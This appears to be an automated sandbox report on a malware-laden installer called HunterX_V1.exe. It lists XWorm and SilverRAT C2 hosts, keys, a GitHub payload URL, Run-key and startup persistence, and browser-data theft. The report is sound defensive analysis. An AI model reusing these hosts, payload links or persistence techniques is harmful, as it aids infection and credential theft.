Analysis
-
max time kernel
46s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
02-01-2025 05:37
General
-
Target
HunterX_V1.exe
-
Size
73.2MB
-
MD5
a518a13a9dfb2f4e4ad1c696e41b3866
-
SHA1
b784968ffafc8ee846291991cb895e79b6ba5a49
-
SHA256
0bb63ed88d325403bca8efd0b2890887ed1f1619bd5c5ee1092a2182b4106b2d
-
SHA512
4600d9004e38a57ad0b2ade6b2bc19ba6338a69689355cc2ffd427a13d9cb8387169d73dd38595115e935e32cf76b4b574bf6a009661bddbc20af1c675a7ffd0
-
SSDEEP
1572864:syYytvKL3qcxnuAOqzpgMjjWpXijl7UVb3BOpiy1Cfe8sEF8mye9gu:C4KmcxucyXw7sOc26e8sy8Xer
Malware Config
Extracted
https://github.com/NGROKC/CTC/raw/main/CTC64.dll
Extracted
xworm
SLL.casacam.net:4444
-
Install_directory
%LocalAppData%
-
install_file
Interrupi.exe
Extracted
silverrat
1.0.0.0
SLLSS.ooguy.com:3333
x_ipNAVkdRSH
-
certificate
MIIE4DCCAsigAwIBAgIQAKQYOfZd86J2BfNjhG4CWTANBgkqhkiG9w0BAQ0FADARMQ8wDQYDVQQDDAZTaWx2ZXIwIBcNMjIwODI2MTkwMTA4WhgPOTk5OTEyMzEyMzU5NTlaMBExDzANBgNVBAMMBlNpbHZlcjCCAiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAPbpOWfhZTuOfEaqqImTTe5dNHAAry7/mf00DCoI4lPZfypsc1tYraxSPFeayGu09a3qdhkWKSVIgwnu2n4GLQNOCY9fh/1oyrX4Iir3BIkYeU7pKTWgjhUlAmFAUAaNr0ca23Ku2kN79jrDzRznOgE2DEW4p7OiM4Mb097ma9lzu7MyssHbY4VCteAhj9HZiplqBxaC1vXDmzxqG+gUZ1aLcyG7ssdkOjtWVBgT3gD/gOl7KchRzCFB1egDC/vD9WZCG35U3Ngi+IkTznoXR1R06cq4v0UnGjE37R2vcB21qb0ZYNiZJXZHv5i9+R7xoPeNoLda5PqnfGGbhPvNEdD56mdcOKlzGIuyemLkUo8texdpiBWKbtc3JZf5VsKxjJtHDK3xW6gDGI+PAirzGkFPmwcf8WgsblvzLg8OZpVxVs8rmKWoi6qIrf4CXnyl73J4lgzW+ir7PjANAQXwLNGdNnvdMeLeo/muGQPdeNpr6OczGGnkWA4qniHeL51/Gx0a8A+jP9zKiyu+qHcsP2IotgWDH/KlzJVr7IAum+DV92uV8poTDcUNcHaKvhHA65KmEtsvLbK6lFZcAMC0eWC0VgpW44T1/16rOaaky5mP6rTMc3nSyOl/lU/XgAgGGQPe22bRLWYzd3WVeEpI1WnHYXS+tL9IOe4kJP+pYsWDAgMBAAGjMjAwMB0GA1UdDgQWBBR32TJj2LeUx9L+RcSOvmFV6VJq6TAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBDQUAA4ICAQA+qucSOi7ov7Q1FmAjMf925KuvKuCNwJiu3Sqo3FDGVAD1fAwAi2FdyuXEO2VIUPZCkalFcBna5rqyrc6tcS4T0IL2TsYLrsuGir7PWP7CAcft1urYS1HpNpHxeH/nixwnQaQs/MuRmdm2TeCj6G21P5BTW55U5y9sMPSYwhbD2N7XLgnSQd5Y+80TR7FUiye/k3D37fI9PRhSQGbfYFRQQTmxj84dPTnY5CVgaY9d8fNiFZkyjaZdf+mibK0xQTf+xLVVj+toDNCkc1F462TdmFhCrHd4PoMo0yLDNv4SC6NLRq4haWDRtORw6gd5GYIoCQ3m3oQvNlNxXhhIjsOyxkxOrkCD0c+57PIc7EmKXieJa/XxnkcIVxO8dvTY/vijuz/VaZYl/lPu9ckuqgJ1wRvvsHl70Trv4Mn4X5uCIqRFFlK/mSOZbLIguGkDN3QIZABvej89vlZMhrVfZOG2oawe23FskHjv7thF/WzOXtWw6RUVC1V+hCwbuxFNUjZmmOTUwdXHnus7I2AuiG6Jz1+y9aYiXBcVTdSljxjHRRmiRaAnY94h58vN8NJ4hKL2GVCo6LxkpuplmcntJN0cKraKTPxSXcCRrqWxX9qoIbfvBcUU4vH1jPJCCLNCuDyD3lgQkpPVvq0EMU1a2HFGgMEQMjpYpb38rcadDhT5ag==
-
decrypted_key
-|S.S.S|-
-
key
yy6zDjAUmbB09pKvo5Hhug==
-
key_x509
V0RMbU1BWVNGTlNTblZNcktSdUdKTHpXZ3Bja3NS
-
reconnect_delay
4
-
server_signature
cSQzQCf6F3J2JnTb2AFrxUoisQLtzNsGfQR1v9wj/4egVuzVarIJVO3pBEpByK/WkcB9UkO4ZvYd3AuTtCiqGYb6Wy1+2wBsOooyk+RH5byjQGQLuQ9aw6yqxln+3wfIQGnTyhkzHu1w07eeR8TKBzCoAa9K3cc1VI10qK61f/G6xZlz13UqN6rtyu6CHWw9sXvCWPquz9z6WuvfDT6unjI4zRyby9f8drQvK3qdGRBIYabFMx3RbuQ0kYteHvrYlkixtUbIlwB97UR4yKx6XCyFZ5btaxpbVkiWZnAXjS7qoj4or2sI0ce7x6838qXZuXWmm5zqqbaa0zIKsVuG9t0RhPiBDx6xpMoY+S9Rp4MCHOrid8UVpc5qpdb1FsvRdDyRyXjtBlfWnYnsZuDMt/xNVLwnfEH7IeZRhAPsfQbhpH97UBuI4yRW0z1Ywg3heZugeJ8i3tJwAQ71CzVTbNWNEHSedLN6h7BKSVbcXAI/WQQHr3aTOOlDzCyjRHpdBMQOzBiuUsK/BqLJ+z+7MBuZoYFM5HVAZxMYiATEzqgdfhvKkQr+9ojhm1bGlBYfLkS33cvkkgRlgCkHHfGsJp65WU60csYXje+MBT/iJPHFf2e1I5sL9xI9RxY9dFzWOD+eYg2osuGm+fal3DU/3m3zbms+LKQVXHszsELNKl0=
Signatures
-
Detect Xworm Payload 4 IoCs
resource yara_rule behavioral1/files/0x0007000000023c7b-17.dat family_xworm behavioral1/files/0x0007000000023c7c-33.dat family_xworm behavioral1/memory/2852-38-0x00000000003B0000-0x00000000003D6000-memory.dmp family_xworm behavioral1/memory/3212-36-0x0000000000110000-0x0000000000128000-memory.dmp family_xworm -
Silverrat family
-
Xworm family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 18 3704 powershell.exe 20 3704 powershell.exe -
pid Process 3704 powershell.exe 5184 powershell.exe 4076 powershell.exe 1968 powershell.exe 888 powershell.exe 5508 powershell.exe -
Downloads MZ/PE file
-
Sets file to hidden 1 TTPs 8 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 4196 attrib.exe 4968 attrib.exe 4316 attrib.exe 5744 attrib.exe 5884 attrib.exe 5280 attrib.exe 1420 attrib.exe 1336 attrib.exe -
Checks computer location settings 2 TTPs 64 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation syss.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Setup.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation S444.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation S444.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation syss.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation HunterX_V1.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation winlogoc.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation Carnom Cracker.exe -
Drops startup file 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Interrupi.lnk winlogoc.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Interrupi.lnk winlogoc.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-System32.exe S444.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-System32.exe S444.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systempu.lnk Setup.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\systempu.lnk Setup.exe -
Executes dropped EXE 64 IoCs
pid Process 3264 S444.exe 2852 Setup.exe 3212 winlogoc.exe 2080 Carnom Cracker.exe 3832 syss.exe 216 S444.exe 1644 Setup.exe 3812 winlogoc.exe 2092 Carnom Cracker.exe 4020 syss.exe 1416 S444.exe 4240 Setup.exe 2800 winlogoc.exe 4664 Carnom Cracker.exe 2424 syss.exe 3952 S444.exe 1840 Setup.exe 4668 winlogoc.exe 320 Carnom Cracker.exe 932 syss.exe 852 S444.exe 452 Setup.exe 1044 winlogoc.exe 4748 Carnom Cracker.exe 2752 syss.exe 4432 S444.exe 1596 Setup.exe 3484 winlogoc.exe 3044 Carnom Cracker.exe 5068 syss.exe 3700 S444.exe 4336 Setup.exe 2184 winlogoc.exe 4636 Carnom Cracker.exe 1636 syss.exe 1680 S444.exe 4844 Setup.exe 1576 winlogoc.exe 2848 Carnom Cracker.exe 4920 syss.exe 2540 S444.exe 3424 Setup.exe 2552 winlogoc.exe 2580 Carnom Cracker.exe 1480 syss.exe 3060 S444.exe 2460 Setup.exe 748 winlogoc.exe 2392 Carnom Cracker.exe 956 syss.exe 3156 S444.exe 3084 Setup.exe 1176 winlogoc.exe 1088 Carnom Cracker.exe 3928 syss.exe 984 S444.exe 2812 Setup.exe 376 winlogoc.exe 1644 Carnom Cracker.exe 1872 syss.exe 556 S444.exe 2516 Setup.exe 4984 winlogoc.exe 1084 Carnom Cracker.exe -
Loads dropped DLL 7 IoCs
pid Process 3596 MsiExec.exe 3596 MsiExec.exe 3596 MsiExec.exe 3596 MsiExec.exe 3596 MsiExec.exe 668 MsiExec.exe 668 MsiExec.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 4 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Interrupi = "C:\\Users\\Admin\\AppData\\Local\\Interrupi.exe" winlogoc.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-System32.exe" S444.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\$77-System32 = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-System32.exe" S444.exe Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\systempu = "C:\\ProgramData\\systempu.exe" Setup.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\T: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 19 raw.githubusercontent.com 20 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 14 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\tk8.6\demos\colors.tcl msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtCore\qsequentialanimationgroup.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtCore\qlocale.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\qml\QtQuick\Controls\Private\EditMenu_base.qml msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\qml\QtQuick\Scene2D\qmldir msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\qml\QtQuick3D\designer\ShaderInfoSection.qml msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\tcl8.6\msgs\hi_in.msg msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtBluetooth\qpybluetooth_qlist.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\qml\QtQuick\Controls\Styles\Desktop\ButtonStyle.qmlc msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\setuptools\_vendor\importlib_metadata\_compat.pyc msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\tcl8.6\tzdata\Europe\Luxembourg msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtHelp\qhelplink.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtNetwork\qdnslookup.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\tcl8.6\tzdata\Europe\Tallinn msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\_queue.pyd msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\qml\QtQuick\Controls.2\designer\images\[email protected] msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtNfc\qndefnfctextrecord.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\qml\QtQuick\Controls.2\Fusion\SplitView.qml msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\qml\QtQuick3D\designer\CustomCameraSpecifics.qml msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\translations\qt_help_uk.qm msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\setuptools\_vendor\tomli\_re.pyc msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\tk8.6\images\pwrdLogo150.gif msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\distutils\tests\Setup.sample msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\test\decimaltestdata\ddXor.decTest msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\tk8.6\demos\ttkprogress.tcl msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\libffi-7.dll msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\tcl8.6\tzdata\Hongkong msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\test\decimaltestdata\ddMax.decTest msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\qml\QtQuick\Controls\Styles\Base\TextFieldStyle.qmlc msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtLocation\qplacecontentrequest.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtDBus\qpydbuspendingreply.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtQuick3D\QtQuick3Dmod.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtSerialPort\qserialport.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtWinExtras\qwinjumplistitem.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\qml\QtQuick\Dialogs\qml\icons.ttf msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\qml\QtQuick3D\Materials\designer\IdComboBox.qml msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\translations\qtlocation_bg.qm msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\encodings\shift_jisx0213.pyc msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\test\decimaltestdata\and.decTest msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\tcl8.6\msgs\cs.msg msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtQml\qqmlabstracturlinterceptor.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\setuptools\_vendor\packaging\_elffile.pyc msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\test\decimaltestdata\dqQuantize.decTest msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\tk8.6\ttk\utils.tcl msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\_tkinter.pyd msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\coincurve\utils.pyc msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\qml\QtQuick\Controls\SplitView.qmlc msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\qml\QtQuick\Controls.2\Universal\VerticalHeaderView.qml msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\encodings\rot_13.pyc msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtCore\qstringlistmodel.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtGui\qtransform.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtMultimedia\qmedianetworkaccesscontrol.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\tcl8.6\tzdata\Atlantic\Faroe msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\test\cjkencodings\johab-utf8.txt msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\Crypto\Hash\SHA3_384.pyi msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtWidgets\qfontdialog.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\qml\QtQuick\Extras\designer\images\delaybutton-icon.png msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\encodings\iso2022_jp_2004.pyc msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\qml\QtQuick3D\Effects\EdgeDetect.qml msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\email\encoders.pyc msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\pycparser\lextab.pyc msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtGui\qquaternion.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\bindings\QtMultimedia\qaudiorecorder.sip msiexec.exe File created C:\Program Files (x86)\Mmdrza.Com\HunterX\lib\PyQt5\Qt5\qml\QtQuick\Controls.2\Fusion\CheckBox.qml msiexec.exe -
Drops file in Windows directory 14 IoCs
